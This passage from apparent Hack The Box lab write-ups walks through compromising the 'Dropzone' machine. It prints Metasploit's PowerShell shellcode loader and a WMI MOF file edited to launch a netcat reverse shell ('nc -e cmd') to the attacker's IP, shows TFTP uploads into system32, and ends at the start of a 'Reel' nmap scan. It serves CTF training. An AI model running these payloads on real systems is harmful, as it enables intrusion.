SERVICE_NAME no The service name
SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.18 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > irb
[*] Starting IRB shell...
[*] You are in exploit/windows/smb/psexec
So here we are in interactive ruby
msf6 exploit(windows/smb/psexec) > irb
[*] Starting IRB shell...
[*] You are in exploit/windows/smb/psexec
>>
>> cmd_psh_payload("IppsecRocks","x86")
=> "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\""
And here we have generated our powershell payload containing the "IppsecRocks" command, for the "x86" architecture. So first of all it compresses as gzip and base64 encodes our payload :
![](prg/10/2.png)
Now we copy that base64 string and echo it out of it's base64 encryption to a file which we know is gzip:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ echo 'H4sIABRp4F8CA7VW+2vbSBD+OYH8D0sRaAWKcJNSaCBwtlO3aWPHrfK6uuLYSCN709Wuu7tKo/b6v9+sHolDnbukcMLgfczzm29GykuZWq4kWbyPY/Jja3NjyjQrCPUyNSwnIfFSNTp5H2xs4JUnpLgg+4TO+svlgSoYl8ne3rDUGqRt9tEbsH1joLgUHAwNyN/kfAEato8vryC15Afx/oreCHXJRCtWDVm6ALLdl5m7O1IpcwFF8VJwS/3Pn/1gtv08iV5/LZkw1I8rY6GIMiH8gPwMnMOTagnUH/NUK6NyG51zubsTnUrDcpigtWsYg12ozPgBZoE/DbbUktT5OAPNNfVxOdUq7WeZBmP8kMyc6VmS/EFnrd+PpbS8gOhQWtBqGYO+5imY6C2TmYCPkCeoFVvN5TwJAhS7Vl+AerIUIiRPMUMn8K1D7bFKdFUJpaZWByHWck2eY5WVAhpNf02gTf0DfG45gOD93Nrc2sw7ztjs6yplcLUxq9eA8dGpMrwW2ye9kIzRE7NKV7j1TnQJQXKLLvHmFx9Y+LD+804YRQt99QGPZmeKZwmqtCX1qnfu9GFiHkDOJRxUkhU87bhH16EMuYA6wagTm2BI1G8vIDsAAXNmHW6u2L+ovS64vdUdlFxkoPspVspgVFjE4H4wTSmofyjHUCBCzR7Z5+XIeOikW5ZXnXe3RyF/KJgxIZmW2HJpSGJgArKQ9KXh7VW/tKpe+nfhjkthecqM7cwlQYNi622opLG6TLFkmPlJvISUM+GACMlbnsGgivm88+qvhWHIhMA2QEvXWAY8cenH1hFBY4B10YMoBntYLAUUKFN3/kiwOfZ5S/aaOWwOmX8/vo7KDW8dDh0AK9FhcWOhbEjOuLY4Phymjj+/53xlcGAYQw1tEWjXGLNBZR2fPVOeOjK2kNQAaIvJj7QqBszAyxfNhKDP4ovBt3Tn7Oq0eHXFdsf7z5wj9OR9T4/+XLHxUOuPmTYLJtA29nRXypHSo7ZHp4o7DUrr+f4FtASBsxGnZ4dJXwiVuinhuhkHVDM23BQ7xeXuztpVQG4Fg7vh0R3t7X3CIBFkxCE6Ajm3i7B3s9vr4Rzo3bzoYY6Pz2uolhV1lkI3RmpcWsuithw45L3FRfH/otWWe4F/2X+gdXf2L7ePQrAXNvn+cnz/4El4Pjnzc8YtSsbIVwHNqFwLQMuMlXcJFgXrnreP+xY4Lu32BN8wW5v/APpkNmh5CAAA' | base64 -d > payload.z
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ file payload.z
payload.z: gzip compressed data, last modified: Mon Dec 21 09:21:24 2020, max compression, from Unix, original size modulo 2^32 2169
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ zcat payload.z > payload.powershell
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ zcat payload.z
function hKSS {
Param ($doCuN, $coFTK)
$lnlX = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $lnlX.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($lnlX.GetMethod('GetModuleHandle')).Invoke($null, @($doCuN)))), $coFTK))
}
function tdq {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $gXQa,
[Parameter(Position = 1)] [Type] $mrjQ = [Void]
)
$yJ = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$yJ.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $gXQa).SetImplementationFlags('Runtime, Managed')
$yJ.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $mrjQ, $gXQa).SetImplementationFlags('Runtime, Managed')
return $yJ.CreateType()
}
[Byte[]]$suU = [System.Convert]::FromBase64String("SXBwc2VjUm9ja3M=")
$zcLY = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll VirtualAlloc), (tdq @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $suU.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($suU, 0, $zcLY, $suU.length)
$hXm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll CreateThread), (tdq @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zcLY,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll WaitForSingleObject), (tdq @([IntPtr], [Int32]))).Invoke($hXm,0xffffffff) | Out-Null
So here we see the PowerShell script metasploit really runs: a reflective shellcode loader. The inner base64 is our raw payload bytes, which it copies into memory allocated with VirtualAlloc (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE) and starts with CreateThread. Decoding that inner base64 gives back the string we put in:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ echo "SXBwc2VjUm9ja3M=" | base64 -d
IppsecRocks
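Unwrapping a stager like this by hand works once, but it is the kind of thing you do on every engagement. As an added example (not from the writeup and not Metasploit code), here is a small Python script that does the two decode steps automatically: pull the outer base64 out of the command line, gunzip it, then pull the inner base64 out of the resulting script. The sample command is constructed inside the block from a stub of the loader, because the real one is too long to embed; unwrap_stager works the same way on a real msfvenom psh-cmd line.

```python
import base64
import gzip
import re
from typing import Tuple

# Matches FromBase64String('...'), FromBase64String("...") and the doubled
# quotes (''...'') that appear when the call sits inside a single-quoted
# PowerShell string, as in the msfvenom psh-cmd output above.
_B64_CALL = re.compile(r"FromBase64String\(\s*['\"]*([A-Za-z0-9+/=]+)['\"]*\s*\)")


def unwrap_stager(command: str) -> Tuple[str, bytes]:
    """Return (decoded PowerShell script, inner payload bytes).

    Layer 1: the outer blob is base64 of a gzip stream holding the script.
    Layer 2: the first FromBase64String() inside that script is the raw
    payload the loader copies into RWX memory and starts with CreateThread.
    """
    outer = _B64_CALL.findall(command)
    if not outer:
        raise ValueError("no FromBase64String() call found in command")
    script = gzip.decompress(base64.b64decode(outer[0])).decode("utf-8")
    inner = _B64_CALL.findall(script)
    payload = base64.b64decode(inner[0]) if inner else b""
    return script, payload


def build_sample_command(payload: bytes) -> str:
    """Constructed sample (not real msfvenom output): a stub of the loader
    script wrapped the way the psh-cmd format does it, gzip + base64 inside
    a single-quoted PowerShell argument string."""
    script = (
        '[Byte[]]$suU = [System.Convert]::FromBase64String("'
        + base64.b64encode(payload).decode()
        + '")\n'
        "$zcLY = (hKSS kernel32.dll VirtualAlloc)  # stub, not the full loader\n"
    )
    blob = base64.b64encode(gzip.compress(script.encode())).decode()
    return (
        "powershell.exe -nop -w hidden -c \"$s.Arguments='-noni -nop -w hidden -c "
        "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object "
        "System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,"
        "[System.Convert]::FromBase64String(''" + blob + "''))),"
        "[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))'\""
    )


if __name__ == "__main__":
    script, payload = unwrap_stager(build_sample_command(b"IppsecRocks"))
    print(script)
    print("inner payload:", payload)
```

For a real stager the inner payload is shellcode, so the sensible next step is to write it to a file and look at it with a disassembler rather than printing it.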
So here we see everything metasploit does just to get that PowerShell command in. But again, this is a 32-bit Windows XP machine, so there is no PowerShell to work with. The next option psexec tries is the SMB file upload, which does not help us either: from our earlier enumeration, the SMB ports are not open. What this box required was to go through the techniques psexec.rb tries one by one until you find the one that fits, which is the MOF one, defined in the mof_upload function:
def mof_upload(smb_share)
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
filename = "#{Rex::Text.rand_text_alpha(8)}.exe"
# payload as exe
print_status("Trying wbemexec...")
print_status("Uploading Payload...")
if smb_share != 'ADMIN$'
print_error('Wbem will only work with ADMIN$ share')
return
end
simple.connect(share)
exe = generate_payload_exe
fd = smb_open("\\system32\\#{filename}", 'rwct', write: true)
fd << exe
fd.close
print_status("Created %SystemRoot%\\system32\\#{filename}")
# mof to cause execution of above
mofname = Rex::Text.rand_text_alphanumeric(14) + ".MOF"
mof = generate_mof(mofname, filename)
print_status("Uploading MOF...")
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct', write: true)
fd << mof
fd.close
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
# Disconnect from the ADMIN$
simple.disconnect(share)
end
Here the function announces "Trying wbemexec...", but it only proceeds if the share is ADMIN$, because the wbem\mof directory lives under %SystemRoot%, which is what ADMIN$ maps to. It then connects, generates an exe payload and drops that meterpreter binary into system32. Lastly it calls generate_mof(), uploads the resulting .MOF file into \system32\wbem\mof\ and disconnects. In other words, you get remote code execution just by dropping a file into that folder, and we can do that over TFTP without any SMB at all. Now let's check what generate_mof() produces, from metasploit's interactive ruby mode:
msf6 exploit(windows/smb/psexec) > irb
[*] Starting IRB shell...
[*] You are in exploit/windows/smb/psexec
>> generate_mof("IppsecRocks","AndIsCool")
=> "#pragma namespace(\"\\\\\\\\.\\\\root\\\\cimv2\")\nclass MyClass773\n{\n \t[key] string Name;\n};\nclass ActiveScriptEventConsumer : __EventConsumer\n{\n \t[key] string Name;\n \t[not_null] string ScriptingEngine;\n \tstring ScriptFileName;\n \t[template] string ScriptText;\n uint32 KillTimeout;\n};\ninstance of __Win32Provider as $P\n{\n Name = \"ActiveScriptEventConsumer\";\n CLSID = \"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}\";\n PerUserInitialization = TRUE;\n};\ninstance of __EventConsumerProviderRegistration\n{\n Provider = $P;\n ConsumerClassNames = {\"ActiveScriptEventConsumer\"};\n};\nInstance of ActiveScriptEventConsumer as $cons\n{\n Name = \"ASEC\";\n ScriptingEngine = \"JScript\";\n ScriptText = \"\\ntry {var s = new ActiveXObject(\\\"Wscript.Shell\\\");\\ns.Run(\\\"AndIsCool\\\");} catch (err) {};\\nsv = GetObject(\\\"winmgmts:root\\\\\\\\cimv2\\\");try {sv.Delete(\\\"MyClass773\\\");} catch (err) {};try {sv.Delete(\\\"__EventFilter.Name='instfilt'\\\");} catch (err) {};try {sv.Delete(\\\"ActiveScriptEventConsumer.Name='ASEC'\\\");} catch(err) {};\";\n\n};\nInstance of ActiveScriptEventConsumer as $cons2\n{\n Name = \"qndASEC\";\n ScriptingEngine = \"JScript\";\n ScriptText = \"\\nvar objfs = new ActiveXObject(\\\"Scripting.FileSystemObject\\\");\\ntry {var f1 = objfs.GetFile(\\\"wbem\\\\\\\\mof\\\\\\\\good\\\\\\\\IppsecRocks\\\");\\nf1.Delete(true);} catch(err) {};\\ntry {\\nvar f2 = objfs.GetFile(\\\"AndIsCool\\\");\\nf2.Delete(true);\\nvar s = GetObject(\\\"winmgmts:root\\\\\\\\cimv2\\\");s.Delete(\\\"__EventFilter.Name='qndfilt'\\\");s.Delete(\\\"ActiveScriptEventConsumer.Name='qndASEC'\\\");\\n} catch(err) {};\";\n};\ninstance of __EventFilter as $Filt\n{\n Name = \"instfilt\";\n Query = \"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\\"MyClass773\\\"\";\n QueryLanguage = \"WQL\";\n};\ninstance of __EventFilter as $Filt2\n{\n Name = \"qndfilt\";\n Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE 
TargetInstance ISA \\\"Win32_Process\\\" AND TargetInstance.Name = \\\"AndIsCool\\\"\";\n QueryLanguage = \"WQL\";\n\n};\ninstance of __FilterToConsumerBinding as $bind\n{\n Consumer = $cons;\n Filter = $Filt;\n};\ninstance of __FilterToConsumerBinding as $bind2\n{\n Consumer = $cons2;\n Filter = $Filt2;\n};\ninstance of MyClass773 as $MyClass\n{\n Name = \"ClassConsumer\";\n};\n"
Now we print the output of generate_mof() with ruby's puts function so the escaping becomes readable:
>> puts generate_mof("IppsecRocks","AndIsCool")
#pragma namespace("\\\\.\\root\\cimv2")
class MyClass40351
{
[key] string Name;
};
class ActiveScriptEventConsumer : __EventConsumer
{
[key] string Name;
[not_null] string ScriptingEngine;
string ScriptFileName;
[template] string ScriptText;
uint32 KillTimeout;
};
instance of __Win32Provider as $P
{
Name = "ActiveScriptEventConsumer";
CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
PerUserInitialization = TRUE;
};
instance of __EventConsumerProviderRegistration
{
Provider = $P;
ConsumerClassNames = {"ActiveScriptEventConsumer"};
};
Instance of ActiveScriptEventConsumer as $cons
{
Name = "ASEC";
ScriptingEngine = "JScript";
ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"AndIsCool\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass40351\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};
Instance of ActiveScriptEventConsumer as $cons2
{
Name = "qndASEC";
ScriptingEngine = "JScript";
ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\IppsecRocks\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"AndIsCool\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};
instance of __EventFilter as $Filt
{
Name = "instfilt";
Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass40351\"";
QueryLanguage = "WQL";
};
instance of __EventFilter as $Filt2
{
Name = "qndfilt";
Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"AndIsCool\"";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding as $bind
{
Consumer = $cons;
Filter = $Filt;
};
instance of __FilterToConsumerBinding as $bind2
{
Consumer = $cons2;
Filter = $Filt2;
};
instance of MyClass40351 as $MyClass
{
Name = "ClassConsumer";
};
=> nil
>>
Now i'll copy this entire output into a file to edit:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ mkdir psexec
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ cd psexec
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ vim generated_mof
Now from here, we see that the cleanup script refers to the file wbem\mof\good\IppsecRocks (once the WMI service has compiled a .MOF dropped into wbem\mof, it moves the file to wbem\mof\good, or to wbem\mof\bad if compilation failed) and that the command we're running is s.Run("AndIsCool"), which is JScript. Essentially MOF works like this: the WMI service compiles the file into its repository, and what gets compiled here is a permanent event subscription. A __FilterToConsumerBinding ties together an __EventFilter (a WQL query, here "fire whenever an instance of MyClass40351 is created") and an ActiveScriptEventConsumer (the JScript to run); when the filtered event occurs, the script runs. The last instance block of the file creates exactly such an instance, so compiling the file is what triggers the payload.
(for more information about MOF check out these links: [pop pop ret mof](https://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html) and [BlackHat WMI talk from 2015 by Matt Graeber](https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf))
Now let's trim the useless parts out of our generated mof file:
#pragma namespace("\\\\.\\root\\cimv2")
class MyClass40351
{
[key] string Name;
};
class ActiveScriptEventConsumer : __EventConsumer
{
[key] string Name;
[not_null] string ScriptingEngine;
string ScriptFileName;
[template] string ScriptText;
uint32 KillTimeout;
};
instance of __Win32Provider as $P
{
Name = "ActiveScriptEventConsumer";
CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
PerUserInitialization = TRUE;
};
instance of __EventConsumerProviderRegistration
{
Provider = $P;
ConsumerClassNames = {"ActiveScriptEventConsumer"};
};
Instance of ActiveScriptEventConsumer as $cons
{
Name = "ASEC";
ScriptingEngine = "JScript";
ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"AndIsCool\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass40351\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};
instance of __EventFilter as $Filt
{
Name = "instfilt";
Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass40351\"";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding as $bind
{
Consumer = $cons;
Filter = $Filt;
};
instance of MyClass40351 as $MyClass
{
Name = "ClassConsumer";
};
and from here, we don't want to run the command "AndIsCool" but we want the command "nc -e cmd 10.10.14.6 9002" so from inside vim you can run the following : **:%s/AndIsCool/nc -e cmd 10.10.14.6 9002/gi** in order to replace the AndIsCool pattern matched by regex to whatever other string we want.
![](prg/10/3.png)
Now basically what this does is that our __EventFilter will detect the creation of an instance of MyClass40351, which the last block of the file does as soon as the MOF is compiled, and when that happens it will launch the code we want (the netcat command).
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ ls -l
total 4
-rw-r--r-- 1 nothing nothing 1415 Dec 21 11:10 generated_mof
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ locate nc.exe
/usr/lib/mono/4.5/cert-sync.exe
/usr/share/windows-resources/binaries/nc.exe
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ cp /usr/share/windows-resources/binaries/nc.exe .
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ ls -l
total 64
-rw-r--r-- 1 nothing nothing 1415 Dec 21 11:10 generated_mof
-rwxr-xr-x 1 nothing nothing 59392 Dec 21 11:10 nc.exe
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ file nc.exe
nc.exe: PE32 executable (console) Intel 80386, for MS Windows
So now we have the correct 32bit nc.exe file we want, now let's upload it via tftp:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ tftp 10.10.10.90
tftp> mode binary
tftp> put nc.exe /windows/system32/nc.exe
Sent 59392 bytes in 4.3 seconds
tftp> quit
We switched from ascii to binary mode to upload our nc file properly:
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [_HTB/Dropzone/psexec]
→ l
total 72K
drwxr-xr-x 2 nothing nothing 4.0K Dec 21 11:10 .
drwxr-xr-x 3 nothing nothing 4.0K Dec 21 10:48 ..
-rw-r--r-- 1 nothing nothing 1.4K Dec 21 11:10 generated_mof
-rwxr-xr-x 1 nothing nothing 58K Dec 21 11:10 nc.exe
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [_HTB/Dropzone/psexec]
→ tftp 10.10.10.90
tftp> put generated_mof /windows/system32/wbem/mof/ippsecrocks.mof
Here we put our MOF file into the \windows\system32\wbem\mof\ directory, where the WMI service will compile it automatically:
![](prg/10/4.png)
And we get a connection! Now let's try to print the root flag:
## **Part 3 : Getting Root Access**
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.90] 1051
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>type C:\Docume~1\Admini~1\Desktop\root.txt
type C:\Docume~1\Admini~1\Desktop\root.txt
It's easy, but not THAT easy...
C:\WINDOWS\system32>type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"
type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"
For limited time only!
Keep an eye on our **ADS** for new offers & discounts!
And from here we see that root.txt isn't where we expected it, but the file in the flags directory hints at ADS, which stands for Alternate Data Streams: extra named streams of data attached to a file on NTFS that a plain dir does not show. Windows XP has no built-in way to list them (dir /R only arrived with Vista), so we download Sysinternals' streams utility [here](https://docs.microsoft.com/en-us/sysinternals/downloads/streams):
![](prg/10/5.png)
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ wget https://download.sysinternals.com/files/Streams.zip
--2020-12-21 11:22:51-- https://download.sysinternals.com/files/Streams.zip
Resolving download.sysinternals.com (download.sysinternals.com)... 152.199.19.160
Connecting to download.sysinternals.com (download.sysinternals.com)|152.199.19.160|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 511505 (500K) [application/octet-stream]
Saving to: Streams.zip
Streams.zip 100%[===========================================================>] 499.52K --.-KB/s in 0.09s
2020-12-21 11:22:52 (5.67 MB/s) - Streams.zip saved [511505/511505]
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ unzip Streams.zip
Archive: Streams.zip
inflating: streams.exe
inflating: streams64.exe
inflating: streams64a.exe
inflating: Eula.txt
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ file streams.exe
streams.exe: PE32 executable (console) Intel 80386, for MS Windows
So here we're going to send the 32-bit executable obviously, since the box is x86, and we're putting it in \windows\system32\ so it is on the PATH and we don't need to type the absolute path every time:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ tftp 10.10.10.90
tftp> mode binary
tftp> put streams.exe /windows/system32/streams.exe
Sent 342392 bytes in 30.2 seconds
Then, in the reverse shell, we move to the flags directory and list the streams of the "2 for the price of 1!.txt" file (the wildcard saves typing the full name, and -accepteula skips the EULA prompt):
cd C:\docume~1\administrator\desktop\flags\
streams -accepteula
streams 2*
And there we have it!
![](prg/10/6.png)
And that's it ! we have been able to get both flags for this box.
## **Conclusion**
Here we can see the progress graph :
![](img/10_graph.png)

868
Hard/11.md Normal file
# Reel Writeup
![](img/11.png)
## Introduction :
Reel is a hard windows box released back in June 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.77 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 135/tcp on 10.10.10.77
Discovered open port 21/tcp on 10.10.10.77
Discovered open port 22/tcp on 10.10.10.77
Discovered open port 139/tcp on 10.10.10.77
Discovered open port 25/tcp on 10.10.10.77
Discovered open port 445/tcp on 10.10.10.77
Discovered open port 49159/tcp on 10.10.10.77
Discovered open port 593/tcp on 10.10.10.77
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ sudo nmap -sCV -p21,22,139,25,445,593,49159 10.10.10.77
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 17:16 CET
Nmap scan report for 10.10.10.77
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.91%I=7%D=1/12%Time=5FFDCB73%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
